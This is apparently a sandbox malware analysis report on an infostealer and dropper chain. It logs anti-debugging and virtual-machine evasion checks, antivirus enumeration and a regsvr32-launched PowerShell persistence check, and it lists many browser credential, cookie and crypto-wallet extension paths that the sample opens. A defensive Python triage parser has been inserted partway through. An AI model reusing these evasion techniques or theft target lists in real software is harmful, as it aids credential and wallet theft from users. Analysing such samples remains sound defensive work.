Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053900001\91fd14a9f3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_001FCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 9_2_001FCBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_001E65E0 LookupAccountNameA, 9_2_001E65E0
Source: C:\Users\user\Desktop\p199AjsEFs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: p199AjsEFs.exe, p199AjsEFs.exe, 00000000.00000003.2286309899.00000000055E1000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2274757871.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2275467569.00000000055EB000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2274610176.00000000055EB000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2281586610.00000000055EB000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2374899727.00000000055E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\p199AjsEFs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
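The behaviour records above (sleep-loop evasion, HideFromDebugger, DebugPort queries, debugger window-class probes, SoftICE device names, rdtsc timing, BIOS and WMI fingerprinting, the AntiVirusProduct enumeration, and the regsvr32-launched PowerShell that tests for the uxtheme_2.drv scheduled task) are easier to act on once they are rolled up per process. The following Python triage helper is an added example, not part of the Joe Sandbox report or any of the samples' code. It assumes the "Source: <path> <event>" line shape shown on this page; the technique labels, the regular expressions and the handful of copied lines in SAMPLE_LINES are the author's own constructed input, and sleep_calls simply sums the reported "Thread sleep count" values.

```python
"""Roll up Joe Sandbox 'Source:' behaviour lines into per-process evasion indicators."""
import re
from collections import defaultdict

# Constructed input: a subset of the behaviour lines from this report, copied
# verbatim (including the trailing "Jump to behavior" link text) so the parser
# works on an unedited copy-paste of the page.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3784 Thread sleep count: 1330 > 30 Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3784 Thread sleep time: -2661330s >= -30000s Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4092 Thread sleep count: 420 > 30 Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Code function: 4_2_051B0CB9 rdtsc 4_2_051B0CB9",
    r"Source: C:\Users\user\Desktop\p199AjsEFs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS",
    r"Source: C:\Users\user\Desktop\p199AjsEFs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct",
    r"Source: C:\Users\user\Desktop\p199AjsEFs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior",
    r'''Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"''',
]

# "Source: <path ending in .exe/.tmp/.dll> <event text>"; paths may contain spaces,
# so the match is non-greedy up to the first extension followed by a space.
SOURCE_RE = re.compile(r"^Source: (.+?\.(?:exe|tmp|dll)) (.*)$")

# Technique labels are the author's own; each regex targets one event shape seen in the report.
RULES = [
    ("sleep_evasion", re.compile(r"Thread sleep count: (\d+) > 30")),
    ("hide_from_debugger", re.compile(r"Thread information set: HideFromDebugger")),
    ("debugger_window_scan", re.compile(r"Open window title or class name: (.+?)(?: Jump to behavior)?$")),
    ("softice_device_probe", re.compile(r"File opened: (NTICE|SICE|SIWVID)$")),
    ("debugport_query", re.compile(r"Process queried: DebugPort")),
    ("rdtsc_timing", re.compile(r"\brdtsc\b")),
    ("bios_fingerprint", re.compile(r"SystemBiosVersion|VideoBiosVersion|FROM Win32_BIOS")),
    ("av_product_enum", re.compile(r"ROOT\\SecurityCenter2 : SELECT \* FROM AntiVirusProduct")),
    ("machine_guid_read", re.compile(r"Cryptography MachineGuid")),
    ("scheduled_task_check", re.compile(r"Get-ScheduledTask")),
]

# Pulls the regsvr32 argument string the dropper compares scheduled-task actions against.
TASK_ARGS_RE = re.compile(r"Actions\.Arguments -eq '([^']+)'")


def parse_line(line):
    """Return (process basename, event text) or None for non-process lines (Yara hits, memory strings)."""
    m = SOURCE_RE.match(line.strip())
    if not m:
        return None
    path, event = m.groups()
    return path.rsplit("\\", 1)[-1], event


def summarize(lines):
    """Map each process to its sorted technique labels, summed sleep-loop count and probed window names."""
    acc = defaultdict(lambda: {"techniques": set(), "sleep_calls": 0, "window_probes": set()})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        proc, event = parsed
        for label, rx in RULES:
            m = rx.search(event)
            if not m:
                continue
            entry = acc[proc]
            entry["techniques"].add(label)
            if label == "sleep_evasion":
                entry["sleep_calls"] += int(m.group(1))
            elif label == "debugger_window_scan":
                entry["window_probes"].add(m.group(1))
    return {
        proc: {
            "techniques": sorted(e["techniques"]),
            "sleep_calls": e["sleep_calls"],
            "window_probes": sorted(e["window_probes"]),
        }
        for proc, e in acc.items()
    }


def persisted_task_argument(lines):
    """Return the regsvr32 arguments the dropper's Get-ScheduledTask check looks for, if present."""
    for line in lines:
        m = TASK_ARGS_RE.search(line)
        if m:
            return m.group(1)
    return None


if __name__ == "__main__":
    for proc, info in summarize(SAMPLE_LINES).items():
        print(f"{proc}: {', '.join(info['techniques'])} (sleep calls: {info['sleep_calls']})")
    print("persistence check argument:", persisted_task_argument(SAMPLE_LINES))
```

The extracted argument string doubles as a hunt: on a live host the same Get-ScheduledTask filter the dropper runs, with the exit codes replaced by returning the matching task object, locates any task that launches regsvr32 with /S /i:SYNC against a file under %APPDATA%, which is not a path a legitimate installer registers a COM server from.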

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 4.2.6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.skotes.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.skotes.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2629584410.0000000005030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2421834554.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3406474336.00000000001E1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2465081662.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2505620338.00000000001E1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2519790292.00000000001E1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2463197759.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: p199AjsEFs.exe PID: 2268, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000003.00000002.2438234450.0000000000331000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2449611202.000000000144E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2391784243.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: HT94GNC6NP3AGR6EM8I9D3647.exe PID: 6316, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: p199AjsEFs.exe, 00000000.00000003.2274757871.00000000008CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
Source: p199AjsEFs.exe, 00000000.00000003.2274757871.00000000008CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: p199AjsEFs.exe String found in binary or memory: Jaxx Liberty
Source: p199AjsEFs.exe, 00000000.00000003.2274757871.00000000008CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: p199AjsEFs.exe, 00000000.00000003.2259799476.00000000008CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: p199AjsEFs.exe String found in binary or memory: ExodusWeb3
Source: p199AjsEFs.exe, 00000000.00000003.2274757871.00000000008CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: p199AjsEFs.exe, 00000000.00000003.2259755643.000000000091E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
